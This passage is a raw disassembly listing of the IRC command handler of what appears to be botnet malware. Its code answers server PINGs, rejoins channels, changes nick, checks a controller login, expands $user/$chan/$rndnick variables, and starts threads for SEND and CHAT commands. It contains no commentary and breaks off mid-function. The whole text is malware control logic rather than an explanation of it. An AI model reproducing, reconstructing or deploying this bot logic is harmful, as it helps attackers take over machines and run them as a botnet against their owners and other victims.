var_13DC = dword ptr -13DCh var_13D8 = dword ptr -13D8h var_13D4 = byte ptr -13D4h var_1354 = byte ptr -1354h var_12D4 = byte ptr -12D4h var_1254 = dword ptr -1254h var_1250 = dword ptr -1250h var_124C = dword ptr -124Ch var_1248 = dword ptr -1248h var_1244 = dword ptr -1244h var_1240 = dword ptr -1240h var_123C = dword ptr -123Ch var_1238 = dword ptr -1238h var_1230 = byte ptr -1230h var_11B0 = byte ptr -11B0h var_1130 = dword ptr -1130h var_112C = dword ptr -112Ch var_1128 = dword ptr -1128h var_1120 = dword ptr -1120h var_111C = dword ptr -111Ch var_1118 = dword ptr -1118h var_1110 = dword ptr -1110h var_110C = byte ptr -110Ch var_108C = byte ptr -108Ch var_100C = dword ptr -100Ch var_1008 = dword ptr -1008h var_1004 = dword ptr -1004h var_FFC = dword ptr -0FFCh var_FF8 = dword ptr -0FF8h var_FF4 = dword ptr -0FF4h var_FF0 = dword ptr -0FF0h var_FEC = dword ptr -0FECh var_FE8 = byte ptr -0FE8h var_F68 = dword ptr -0F68h var_F64 = dword ptr -0F64h var_F60 = dword ptr -0F60h var_F5C = dword ptr -0F5Ch var_F58 = dword ptr -0F58h var_F54 = byte ptr -0F54h var_ED4 = dword ptr -0ED4h var_ED0 = dword ptr -0ED0h var_ECC = dword ptr -0ECCh var_EC8 = dword ptr -0EC8h var_EC4 = dword ptr -0EC4h var_EC0 = byte ptr -0EC0h var_E40 = dword ptr -0E40h var_E3C = dword ptr -0E3Ch var_E38 = dword ptr -0E38h var_E34 = dword ptr -0E34h var_E30 = byte ptr -0E30h var_E10 = byte ptr -0E10h var_E00 = byte ptr -0E00h var_D80 = dword ptr -0D80h var_D7C = byte ptr -0D7Ch var_CFC = byte ptr -0CFCh var_C7C = dword ptr -0C7Ch var_C78 = dword ptr -0C78h var_C74 = dword ptr -0C74h var_C70 = dword ptr -0C70h var_C6C = dword ptr -0C6Ch var_C68 = dword ptr -0C68h var_C64 = dword ptr -0C64h var_C60 = dword ptr -0C60h var_C5C = dword ptr -0C5Ch var_C58 = dword ptr -0C58h var_C54 = byte ptr -0C54h var_BD4 = dword ptr -0BD4h var_BD0 = dword ptr -0BD0h var_BCC = dword ptr -0BCCh var_BC8 = dword ptr -0BC8h var_BC4 = byte ptr -0BC4h var_B44 = dword ptr -0B44h var_B40 = dword ptr -0B40h var_B3C = dword ptr -0B3Ch var_B38 = dword ptr -0B38h var_B34 = dword ptr -0B34h var_B30 = dword ptr -0B30h var_B2C = byte ptr -0B2Ch var_AAC = dword ptr -0AACh var_AA8 = dword ptr -0AA8h var_AA4 = dword ptr -0AA4h var_AA0 = dword ptr -0AA0h var_A9C = dword ptr -0A9Ch var_A98 = dword ptr -0A98h var_A94 = byte ptr -0A94h var_A14 = dword ptr -0A14h var_A10 = dword ptr -0A10h var_A0C = dword ptr -0A0Ch var_A08 = dword ptr -0A08h var_A04 = dword ptr -0A04h var_A00 = dword ptr -0A00h var_9FC = byte ptr -9FCh var_97C = word ptr -97Ch var_978 = dword ptr -978h var_970 = dword ptr -970h var_96C = dword ptr -96Ch var_968 = dword ptr -968h var_960 = byte ptr -960h var_8FF = byte ptr -8FFh var_8FE = byte ptr -8FEh var_8FC = byte ptr -8FCh var_8FB = byte ptr -8FBh var_8F2 = byte ptr -8F2h var_8F0 = byte ptr -8F0h var_8EE = byte ptr -8EEh var_8ED = byte ptr -8EDh var_860 = byte ptr -860h var_850 = byte ptr -850h var_7D0 = byte ptr -7D0h var_750 = dword ptr -750h var_74C = dword ptr -74Ch var_748 = dword ptr -748h var_744 = dword ptr -744h var_740 = dword ptr -740h var_734 = dword ptr -734h var_730 = dword ptr -730h var_728 = dword ptr -728h var_724 = dword ptr -724h var_720 = dword ptr -720h var_71C = dword ptr -71Ch var_714 = dword ptr -714h var_710 = byte ptr -710h var_690 = dword ptr -690h var_688 = dword ptr -688h var_684 = dword ptr -684h var_680 = dword ptr -680h var_678 = dword ptr -678h var_674 = dword ptr -674h var_670 = dword ptr -670h var_668 = dword ptr -668h var_63C = dword ptr -63Ch var_638 = word ptr -638h var_624 = dword ptr -624h var_620 = byte ptr -620h var_5A0 = byte ptr -5A0h var_590 = dword ptr -590h var_58C = dword ptr -58Ch var_584 = dword ptr -584h var_580 = dword ptr -580h var_57C = dword ptr -57Ch var_574 = dword ptr -574h var_570 = byte ptr -570h var_4F0 = dword ptr -4F0h var_4EC = dword ptr -4ECh var_4E8 = dword ptr -4E8h var_4E4 = dword ptr -4E4h var_4E0 = dword ptr -4E0h var_4D8 = dword ptr -4D8h var_4D4 = dword ptr -4D4h var_4D0 = dword ptr -4D0h var_4C8 = byte ptr -4C8h var_4BC = byte ptr -4BCh var_484 = byte ptr -484h var_474 = byte ptr -474h var_3F4 = byte ptr -3F4h var_374 = dword ptr -374h var_370 = dword ptr -370h var_36C = dword ptr -36Ch var_368 = dword ptr -368h var_364 = dword ptr -364h var_358 = dword ptr -358h var_354 = dword ptr -354h var_34C = dword ptr -34Ch var_348 = dword ptr -348h var_344 = dword ptr -344h var_340 = dword ptr -340h var_338 = byte ptr -338h var_31C = word ptr -31Ch var_31A = word ptr -31Ah var_318 = dword ptr -318h var_30C = byte ptr -30Ch var_308 = dword ptr -308h var_2FC = byte ptr -2FCh var_2F8 = byte ptr -2F8h var_2F4 = dword ptr -2F4h var_2E8 = byte ptr -2E8h var_2E4 = byte ptr -2E4h var_2E3 = byte ptr -2E3h var_2E2 = byte ptr -2E2h var_2D8 = dword ptr -2D8h var_2D4 = dword ptr -2D4h var_2D0 = dword ptr -2D0h var_2CC = dword ptr -2CCh var_2C8 = dword ptr -2C8h var_2C4 = byte ptr -2C4h var_C4 = byte ptr -0C4h var_AC = dword ptr -0ACh var_A8 = dword ptr -0A8h var_A4 = dword ptr -0A4h var_A0 = byte ptr -0A0h var_94 = byte ptr -94h var_93 = byte ptr -93h var_92 = byte ptr -92h var_90 = dword ptr -90h var_8C = dword ptr -8Ch var_88 = dword ptr -88h var_84 = dword ptr -84h var_80 = dword ptr -80h var_7C = dword ptr -7Ch var_78 = dword ptr -78h var_50 = byte ptr -50h var_14 = byte ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h arg_20 = dword ptr 28h arg_24 = dword ptr 2Ch arg_28 = dword ptr 30h push ebp mov ebp, esp mov eax, 5D88h call sub_41BB20 push ebx push esi mov esi, 200h push edi xor ebx, ebx push esi lea eax, [ebp+var_2C4] push ebx push eax mov [ebp+var_AC], 3 mov [ebp+var_10], ebx mov [ebp+var_A4], ebx mov [ebp+var_8], ebx mov [ebp+var_4], ebx mov [ebp+var_2C8], ebx call sub_41B590 push 1Bh lea eax, [ebp+var_338] push [ebp+arg_10] push eax call sub_41B5F0 add esp, 18h cmp [ebp+arg_0], ebx jz loc_401E94 push esi lea eax, [ebp+var_4488] push ebx push eax call sub_41B590 dec esi lea eax, [ebp+var_4488] push esi push [ebp+arg_0] push eax call sub_41B5F0 lea eax, [ebp+var_4488] push offset asc_42D12C ; " :" push eax call sub_41B900 mov [ebp+var_C], eax lea eax, [ebp+var_4488] push esi push eax lea eax, [ebp+var_4AF0] push eax call sub_41B5F0 mov esi, offset asc_42D128 ; " " lea eax, [ebp+var_4AF0] push esi push eax call sub_41C0F4 add esp, 34h mov [ebp+var_90], eax lea edi, [ebp+var_8C] mov [ebp+var_A8], 1Fh loc_401BA0: ; CODE XREF: sub_401ACD+E7j push esi push ebx call sub_41C0F4 mov [edi], eax pop ecx add edi, 4 dec [ebp+var_A8] pop ecx jnz short loc_401BA0 mov esi, [ebp+var_90] cmp esi, ebx jz loc_401E94 cmp [ebp+var_8C], ebx jz loc_401E94 push 100h lea eax, [ebp+var_960] push ebx push eax call sub_41B590 add esp, 0Ch lea ecx, [ebp+var_14] push 1Fh pop edx push 1 pop edi loc_401BEE: ; CODE XREF: sub_401ACD+153j mov eax, [ecx] cmp eax, ebx jz short loc_401C1A cmp byte ptr [eax], 2Dh jnz short loc_401C22 cmp [eax+2], bl jnz short loc_401C22 movsx esi, byte ptr [eax+1] mov [ecx], ebx mov [ebp+esi+var_960], 1 mov esi, [ebp+var_90] mov [eax], bl mov [eax+1], bl mov [eax+2], bl loc_401C1A: ; CODE XREF: sub_401ACD+125j dec edx sub ecx, 4 cmp edx, ebx jge short loc_401BEE loc_401C22: ; CODE XREF: sub_401ACD+12Aj ; sub_401ACD+12Fj cmp [ebp+var_8ED], bl jz short loc_401C2D mov [ebp+var_8], edi loc_401C2D: ; CODE XREF: sub_401ACD+15Bj cmp [ebp+var_8F2], bl jz short loc_401C3B mov [ebp+var_8], ebx mov [ebp+var_4], edi loc_401C3B: ; CODE XREF: sub_401ACD+166j cmp byte ptr [esi], 0Ah jz short loc_401C75 push 7Fh lea eax, [ebp+var_E00] push esi push eax call sub_41B5F0 lea eax, [esi+1] push 17h push eax lea eax, [ebp+var_C4] push eax call sub_41B5F0 lea eax, [ebp+var_C4] push offset asc_42D124 ; "!" push eax call sub_41C0F4 add esp, 20h loc_401C75: ; CODE XREF: sub_401ACD+171j push esi push offset aPing ; "PING" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_401CC6 push [ebp+var_8C] mov byte ptr [esi+1], 4Fh push offset aPongS ; "PONG %s\r\n" push [ebp+arg_4] call sub_409A2D mov eax, [ebp+arg_20] add esp, 0Ch cmp [eax], ebx jnz loc_401D6A push [ebp+arg_C] push [ebp+arg_8] push offset aJoinSS ; "JOIN %s %s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 10h jmp loc_401D6A ; --------------------------------------------------------------------------- loc_401CC6: ; CODE XREF: sub_401ACD+1B7j mov esi, [ebp+var_8C] push esi push offset a001 ; "001" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4099E1 push esi push offset a005 ; "005" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4099E1 push esi push offset a302 ; "302" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_401D2E push offset a@ ; "@" push [ebp+var_84] call sub_41B900 pop ecx cmp eax, ebx pop ecx jz short loc_401D6A inc eax push 9Fh push eax push [ebp+arg_1C] call sub_41B5F0 jmp short loc_401D67 ; --------------------------------------------------------------------------- loc_401D2E: ; CODE XREF: sub_401ACD+238j push esi push offset a433 ; "433" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_401D71 push ebx push dword_4290A0 push dword_42909C push [ebp+arg_10] call sub_40B08E add esp, 10h push [ebp+arg_10] push offset aNickS ; "NICK %s\r\n" push [ebp+arg_4] call sub_409A2D loc_401D67: ; CODE XREF: sub_401ACD+25Fj add esp, 0Ch loc_401D6A: ; CODE XREF: sub_401ACD+1D8j ; sub_401ACD+1F4j ... mov eax, edi jmp loc_401E97 ; --------------------------------------------------------------------------- loc_401D71: ; CODE XREF: sub_401ACD+270j mov esi, [ebp+arg_18] mov [ebp+var_A8], 3 mov edi, 80h loc_401D83: ; CODE XREF: sub_401ACD+2DBj lea eax, [ebp+var_E00] push eax push esi call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_401DA0 mov [ebp+var_A4], 1 loc_401DA0: ; CODE XREF: sub_401ACD+2C7j add esi, edi dec [ebp+var_A8] jnz short loc_401D83 mov esi, [ebp+var_8C] push esi push offset aKick ; "KICK" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_401E9C mov esi, [ebp+arg_18] mov [ebp+arg_24], 3 loc_401DCF: ; CODE XREF: sub_401ACD+392j cmp [esi], bl jz loc_401E5A push 7Fh lea eax, [ebp+var_E00] push esi push eax call sub_41B5F0 lea eax, [ebp+var_C4] add esp, 0Ch test eax, eax jz short loc_401E5A cmp [ebp+var_84], ebx jz short loc_401E5A push [ebp+var_84] lea eax, [ebp+var_C4] push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_401E5A lea eax, [ebp+var_C4] mov [esi], bl push eax lea eax, [ebp+var_2C4] push offset unk_42D0B8 push eax call sub_41B886 add esp, 0Ch lea eax, [ebp+var_2C4] push eax lea eax, [ebp+var_C4] push eax push offset aNoticeSS ; "NOTICE %s :%s\r\n" push [ebp+arg_4] call sub_409A2D lea eax, [ebp+var_2C4] push eax call sub_4151AD add esp, 14h loc_401E5A: ; CODE XREF: sub_401ACD+304j ; sub_401ACD+324j ... add esi, edi dec [ebp+arg_24] jnz loc_401DCF push [ebp+var_84] push [ebp+arg_10] call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_401E94 push [ebp+arg_C] mov eax, [ebp+arg_20] push [ebp+arg_8] mov [eax], ebx push offset aJoinSS ; "JOIN %s %s\r\n" loc_401E89: ; CODE XREF: sub_401ACD+612j ; sub_401ACD+8D5j ... push [ebp+arg_4] call sub_409A2D loc_401E91: ; CODE XREF: sub_401ACD+253Cj ; sub_401ACD+2559j ... add esp, 10h loc_401E94: ; CODE XREF: sub_401ACD+5Bj ; sub_401ACD+F1j ... push 1 loc_401E96: ; CODE XREF: sub_401ACD+2A62j pop eax loc_401E97: ; CODE XREF: sub_401ACD+29Fj ; sub_401ACD+2A84j ... pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_401E9C: ; CODE XREF: sub_401ACD+2F2j push esi push offset aNick ; "NICK" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_401FF2 mov eax, [ebp+var_88] mov esi, [ebp+arg_18] inc eax mov [ebp+arg_0], 3 mov [ebp+arg_24], eax loc_401EC5: ; CODE XREF: sub_401ACD+44Aj lea eax, [ebp+var_E00] push eax push esi call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_401F12 lea eax, [ebp+var_E00] push 21h push eax call sub_41BFB0 pop ecx cmp eax, ebx pop ecx mov [ebp+arg_1C], eax jz short loc_401F12 push [ebp+arg_24] lea edi, [esi+2] mov byte ptr [esi], 3Ah lea eax, [edi-1] push eax call sub_41BEB0 push [ebp+arg_1C] push edi call sub_41BEC0 add esp, 10h mov edi, 80h loc_401F12: ; CODE XREF: sub_401ACD+409j ; sub_401ACD+420j add esi, edi dec [ebp+arg_0] jnz short loc_401EC5 lea eax, [ebp+var_C4] test eax, eax jz loc_401E94 cmp [ebp+arg_24], ebx jz loc_401E94 push [ebp+arg_10] lea eax, [ebp+var_C4] push eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_401F5A push 0Fh push [ebp+arg_24] push [ebp+arg_10] call sub_41B5F0 loc_401F52: ; CODE XREF: sub_401ACD+1C36j add esp, 0Ch jmp loc_401E94 ; --------------------------------------------------------------------------- loc_401F5A: ; CODE XREF: sub_401ACD+476j mov edi, [ebp+arg_18] xor esi, esi loc_401F5F: ; CODE XREF: sub_401ACD+4B3j cmp [edi], bl jz short loc_401F76 lea eax, [ebp+var_E00] push eax push edi call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_401F87 loc_401F76: ; CODE XREF: sub_401ACD+494j inc esi add edi, 80h cmp esi, 3 jl short loc_401F5F jmp loc_401E94 ; --------------------------------------------------------------------------- loc_401F87: ; CODE XREF: sub_401ACD+4A7j lea eax, [ebp+var_E00] push 21h push eax call sub_41BFB0 pop ecx cmp eax, ebx pop ecx mov [ebp+arg_0], eax jz loc_401E94 push eax call sub_41AFE0 push [ebp+arg_24] mov edi, eax call sub_41AFE0 add edi, eax pop ecx cmp edi, 7Eh pop ecx ja loc_401E94 push [ebp+arg_0] shl esi, 7 push [ebp+arg_24] add esi, [ebp+arg_18] push offset aSS ; ":%s%s" push esi call sub_41B886 push ebx lea eax, [ebp+var_45EC] push ebx push eax push [ebp+arg_8] push [ebp+arg_4] call sub_409A73 add esp, 24h jmp loc_401E94 ; --------------------------------------------------------------------------- loc_401FF2: ; CODE XREF: sub_401ACD+3DEj push esi push offset aPart ; "PART" call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_402014 push esi push offset aQuit ; "QUIT" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40203B loc_402014: ; CODE XREF: sub_401ACD+534j mov edi, [ebp+arg_18] xor esi, esi loc_402019: ; CODE XREF: sub_401ACD+56Cj cmp [edi], bl jz short loc_40202F push [ebp+var_90] push edi call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_402083 loc_40202F: ; CODE XREF: sub_401ACD+54Ej inc esi add edi, 80h cmp esi, 3 jl short loc_402019 loc_40203B: ; CODE XREF: sub_401ACD+545j push [ebp+var_8C] push offset a353 ; "353" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_4020E4 push [ebp+var_80] push [ebp+arg_8] call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40206F mov eax, [ebp+arg_20] mov dword ptr [eax], 1 loc_40206F: ; CODE XREF: sub_401ACD+597j push [ebp+var_80] push offset unk_42D064 loc_402077: ; CODE XREF: sub_401ACD+28CDj ; sub_401ACD+2C4Dj ... call sub_415221 loc_40207C: ; CODE XREF: sub_401ACD+1BE2j pop ecx loc_40207D: ; CODE XREF: sub_401ACD+7B70j pop ecx jmp loc_401E94 ; --------------------------------------------------------------------------- loc_402083: ; CODE XREF: sub_401ACD+560j mov eax, [ebp+arg_18] shl esi, 7 mov [esi+eax], bl lea eax, [ebp+var_C4] push eax lea eax, [ebp+var_2C4] push offset unk_42D040 push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_4151AD push [ebp+var_8C] push offset aPart ; "PART" call sub_41C070 add esp, 18h test eax, eax jnz loc_401E94 lea eax, [ebp+var_2C4] push eax mov eax, [ebp+var_90] inc eax push eax push offset aNoticeSS ; "NOTICE %s :%s\r\n" jmp loc_401E89 ; --------------------------------------------------------------------------- loc_4020E4: ; CODE XREF: sub_401ACD+582j push [ebp+var_8C] mov esi, offset aPrivmsg ; "PRIVMSG" push esi call sub_41C070 pop ecx mov edi, offset aNotice ; "NOTICE" test eax, eax pop ecx jz short loc_402138 push [ebp+var_8C] push edi call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_402138 push [ebp+var_8C] push offset dword_42D02C call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_409855 cmp dword_429088, ebx jz loc_409855 loc_402138: ; CODE XREF: sub_401ACD+631j ; sub_401ACD+643j push [ebp+var_8C] push esi call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4022BE push [ebp+var_8C] push edi call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4022BE mov eax, [ebp+var_84] inc [ebp+var_80] push 4 mov [ebp+var_88], eax pop esi mov [ebp+var_AC], esi loc_40217C: ; CODE XREF: sub_401ACD+8ADj ; sub_401ACD+8E9j ... shl esi, 2 mov eax, [ebp+esi+var_90] lea edi, [ebp+esi+var_90] push eax push offset dword_42D024 mov [ebp+arg_8], eax call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_402557 push [ebp+esi+var_8C] push offset aSend_0 ; "SEND" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40241E cmp [ebp+var_A4], ebx jz loc_4023F7 push [ebp+esi+var_88] mov edi, offset aS_2 ; "%s" lea eax, [ebp+var_1B80] push edi push eax call sub_41B886 add esp, 0Ch lea eax, [ebp+var_1B94] push [ebp+esi+var_84] push edi push eax call sub_41B886 push [ebp+esi+var_80] call sub_41B779 mov [ebp+var_19FC], eax mov eax, [ebp+arg_4] mov [ebp+var_1B9C], eax lea eax, [ebp+var_C4] push 7Fh push eax lea eax, [ebp+var_1A7C] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 1Ch mov [ebp+var_19F4], eax mov eax, [ebp+var_8] mov [ebp+var_19F0], eax lea eax, [ebp+var_1A7C] push eax lea eax, [ebp+var_1B80] push eax lea eax, [ebp+var_2C4] push offset unk_42CFE8 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 1Ah push eax call sub_40B0F7 add esp, 1Ch mov [ebp+var_19F8], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_1B9C] push ebx push eax push offset sub_4161BD push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_19F8] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz loc_4023E6 loc_4022A8: ; CODE XREF: sub_401ACD+7EFj cmp [ebp+var_19EC], ebx jnz loc_4083BD push 32h call dword_427078 ; Sleep jmp short loc_4022A8 ; --------------------------------------------------------------------------- loc_4022BE: ; CODE XREF: sub_401ACD+67Bj ; sub_401ACD+691j push [ebp+var_8C] push edi call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_4022D7 mov [ebp+var_4], 1 loc_4022D7: ; CODE XREF: sub_401ACD+801j cmp [ebp+var_88], ebx jz loc_401E94 push offset dword_42CFE4 push [ebp+var_88] call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_4022FE cmp [ebp+var_4], ebx jz short loc_40230A loc_4022FE: ; CODE XREF: sub_401ACD+82Aj lea eax, [ebp+var_C4] mov [ebp+var_88], eax loc_40230A: ; CODE XREF: sub_401ACD+82Fj cmp [ebp+var_84], ebx jz loc_401E94 inc [ebp+var_84] jz short loc_402356 cmp [ebp+arg_10], ebx jz short loc_402356 lea eax, [ebp+var_338] push eax call sub_41AFE0 push eax lea eax, [ebp+var_338] push [ebp+var_84] push eax call sub_41BE70 mov esi, eax add esp, 10h neg esi sbb esi, esi add esi, 4 mov [ebp+var_AC], esi jmp short loc_40235C ; --------------------------------------------------------------------------- loc_402356: ; CODE XREF: sub_401ACD+84Fj ; sub_401ACD+854j mov esi, [ebp+var_AC] loc_40235C: ; CODE XREF: sub_401ACD+887j mov edi, [ebp+esi*4+var_90] cmp edi, ebx jz loc_401E94 push edi push offset dword_42CFD8 call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40217C mov ecx, [ebp+var_88] cmp byte ptr [ecx], 23h jz short loc_4023A7 mov eax, ds:dword_4CB508 mov eax, off_429168[eax*4] cmp [eax], bl jz short loc_4023A7 push eax push ecx push offset dword_42CFBC jmp loc_401E89 ; --------------------------------------------------------------------------- loc_4023A7: ; CODE XREF: sub_401ACD+8BCj ; sub_401ACD+8CCj push edi push offset dword_42CFB4 call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40217C mov eax, [ebp+esi*4+var_8C] cmp eax, ebx jz loc_40217C mov ecx, [ebp+var_88] cmp byte ptr [ecx], 23h jz loc_40217C push eax push ecx push offset dword_42CF9C jmp loc_401E89 ; --------------------------------------------------------------------------- loc_4023E6: ; CODE XREF: sub_401ACD+7D5j ; sub_401ACD+7853j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42CF60 jmp loc_4083AE ; --------------------------------------------------------------------------- loc_4023F7: ; CODE XREF: sub_401ACD+6F9j lea eax, [ebp+var_C4] push eax push [ebp+esi+var_88] push offset unk_42CF1C loc_40240A: ; CODE XREF: sub_401ACD+7E2Aj ; sub_401ACD+7E91j lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 10h jmp loc_4083BD ; --------------------------------------------------------------------------- loc_40241E: ; CODE XREF: sub_401ACD+6EDj push [ebp+esi+var_8C] push offset aChat ; "CHAT" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40256D cmp [ebp+var_A4], ebx jz loc_402546 push 1Bh call sub_40B33F test eax, eax pop ecx jnz loc_402535 push [ebp+esi+var_84] lea eax, [ebp+var_2AA8] push offset aS_2 ; "%s" push eax call sub_41B886 push [ebp+esi+var_80] call sub_41B779 mov [ebp+var_2910], eax mov eax, [ebp+arg_4] mov [ebp+var_2AB0], eax lea eax, [ebp+var_C4] push 7Fh push eax lea eax, [ebp+var_2990] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 1Ch mov [ebp+var_2908], eax mov eax, [ebp+var_8] mov [ebp+var_2904], eax lea eax, [ebp+var_C4] push eax lea eax, [ebp+var_2C4] push offset unk_42CEF4 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 1Bh push eax call sub_40B0F7 add esp, 18h mov [ebp+var_290C], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_2AB0] push ebx push eax push offset sub_415C5A push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_290C] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_402524 loc_40250E: ; CODE XREF: sub_401ACD+A55j cmp [ebp+var_2900], ebx jnz loc_4083BD push 32h call dword_427078 ; Sleep jmp short loc_40250E ; --------------------------------------------------------------------------- loc_402524: ; CODE XREF: sub_401ACD+A3Fj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42CEBC jmp loc_4083AE ; --------------------------------------------------------------------------- loc_402535: ; CODE XREF: sub_401ACD+982j lea eax, [ebp+var_C4] push eax push offset unk_42CE8C jmp loc_4083AE ; --------------------------------------------------------------------------- loc_402546: ; CODE XREF: sub_401ACD+972j lea eax, [ebp+var_C4] push eax push offset unk_42CE58 jmp loc_4083AE ; --------------------------------------------------------------------------- loc_402557: ; CODE XREF: sub_401ACD+6D2j mov eax, [ebp+arg_8] lea ecx, [eax+1] mov al, [eax] cmp al, byte_429094 mov [edi], ecx jnz loc_401E94 loc_40256D: ; CODE XREF: sub_401ACD+966j mov edi, [edi] push edi push offset aLogin ; "login" mov [ebp+arg_8], edi call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40985D push edi push offset asc_42CE54 ; "l" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40985D cmp [ebp+var_A4], ebx jnz short loc_4025BE push [ebp+var_8C] push offset dword_42D02C call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_409855 loc_4025BE: ; CODE XREF: sub_401ACD+AD5j cmp [ebp+arg_28], ebx jnz loc_409855 xor edi, edi cmp dword_4294D4, ebx jle loc_402773 mov [ebp+arg_20], offset dword_43D810 loc_4025DC: ; CODE XREF: sub_401ACD+B2Ej push [ebp+arg_8] push [ebp+arg_20] call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_402602 add [ebp+arg_20], 0B8h inc edi cmp edi, dword_4294D4 jl short loc_4025DC jmp loc_402773 ; --------------------------------------------------------------------------- loc_402602: ; CODE XREF: sub_401ACD+B1Ej push offset asc_42D12C ; " :" push [ebp+arg_0] call sub_41B900 pop ecx cmp eax, ebx pop ecx jz loc_401E94 mov cl, byte_429094 imul edi, 0B8h mov [eax+2], cl mov cl, byte_429094 mov [eax+3], cl lea ecx, dword_43D828[edi] push 9Fh add eax, 4 push ecx push eax call sub_41B5F0 lea eax, [ebp+esi+var_50] add esp, 0Ch mov [ebp+arg_20], 0Fh mov [ebp+arg_C], eax loc_402657: ; CODE XREF: sub_401ACD+C3Bj push [ebp+arg_20] lea eax, [ebp+var_A0] push offset aD_1 ; "$%d-" push eax call sub_41B886 lea eax, [ebp+var_A0] push eax push [ebp+arg_0] call sub_41B900 add esp, 14h test eax, eax jz short loc_4026C3 mov eax, [ebp+arg_C] cmp [eax], ebx jz short loc_4026C3 lea eax, dword_43D810[edi] push eax call sub_41AFE0 add [ebp+var_C], eax pop ecx jz short loc_4026FE mov eax, [ebp+arg_C] push dword ptr [eax-4] push [ebp+var_C] call sub_41B900 pop ecx cmp eax, ebx pop ecx jz short loc_4026FE push eax lea eax, [ebp+var_A0] push eax push [ebp+arg_0] call sub_417EEF add esp, 0Ch jmp short loc_4026FE ; --------------------------------------------------------------------------- loc_4026C3: ; CODE XREF: sub_401ACD+BB2j ; sub_401ACD+BB9j mov eax, [ebp+arg_C] cmp [eax], ebx jnz short loc_4026FE lea eax, [ebp+var_A0] push 2 push eax lea eax, [ebp+var_94] push eax call sub_41B5F0 lea eax, [ebp+var_94] mov [ebp+var_92], bl push eax lea eax, [ebp+var_A0] push eax push [ebp+arg_0] call sub_417EEF add esp, 18h loc_4026FE: ; CODE XREF: sub_401ACD+BCBj ; sub_401ACD+BDFj ... dec [ebp+arg_20] sub [ebp+arg_C], 4 cmp [ebp+arg_20], ebx jg loc_402657 lea eax, [ebp+esi+var_50] mov [ebp+arg_20], 10h mov edi, eax loc_40271B: ; CODE XREF: sub_401ACD+C9Aj push [ebp+arg_20] lea eax, [ebp+var_A0] push offset aD_0 ; "$%d" push eax call sub_41B886 lea eax, [ebp+var_A0] push eax push [ebp+arg_0] call sub_41B900 add esp, 14h test eax, eax jz short loc_40275E mov eax, [edi] cmp eax, ebx jz short loc_40275E push eax lea eax, [ebp+var_A0] push eax push [ebp+arg_0] call sub_417EEF add esp, 0Ch loc_40275E: ; CODE XREF: sub_401ACD+C76j ; sub_401ACD+C7Cj dec [ebp+arg_20] sub edi, 4 cmp [ebp+arg_20], ebx jg short loc_40271B mov [ebp+var_2C8], 1 loc_402773: ; CODE XREF: sub_401ACD+B02j ; sub_401ACD+B30j mov eax, [ebp+arg_8] mov al, [eax] cmp al, byte_429094 jz short loc_40278C cmp [ebp+var_2C8], ebx jz loc_40297D loc_40278C: ; CODE XREF: sub_401ACD+CB1j push [ebp+arg_10] mov edi, [ebp+arg_0] push offset aMe ; "$me" push edi call sub_417EEF lea eax, [ebp+var_C4] push eax push offset aUser_0 ; "$user" push edi call sub_417EEF push [ebp+var_88] push offset aChan ; "$chan" push edi call sub_417EEF push ebx push ebx lea eax, [ebp+var_A0] push 2 push eax call sub_40B08E push eax push offset aRndnick_0 ; "$rndnick" push edi call sub_417EEF add esp, 40h push [ebp+arg_14] push offset aServer_1 ; "$server" push edi call sub_417EEF mov edi, offset aChr ; "$chr(" push edi push [ebp+arg_0] call sub_41B900 add esp, 14h loc_4027FE: ; CODE XREF: sub_401ACD+E29j test eax, eax jz loc_4028FB push edi push [ebp+arg_0] call sub_41B900 mov [ebp+arg_10], eax 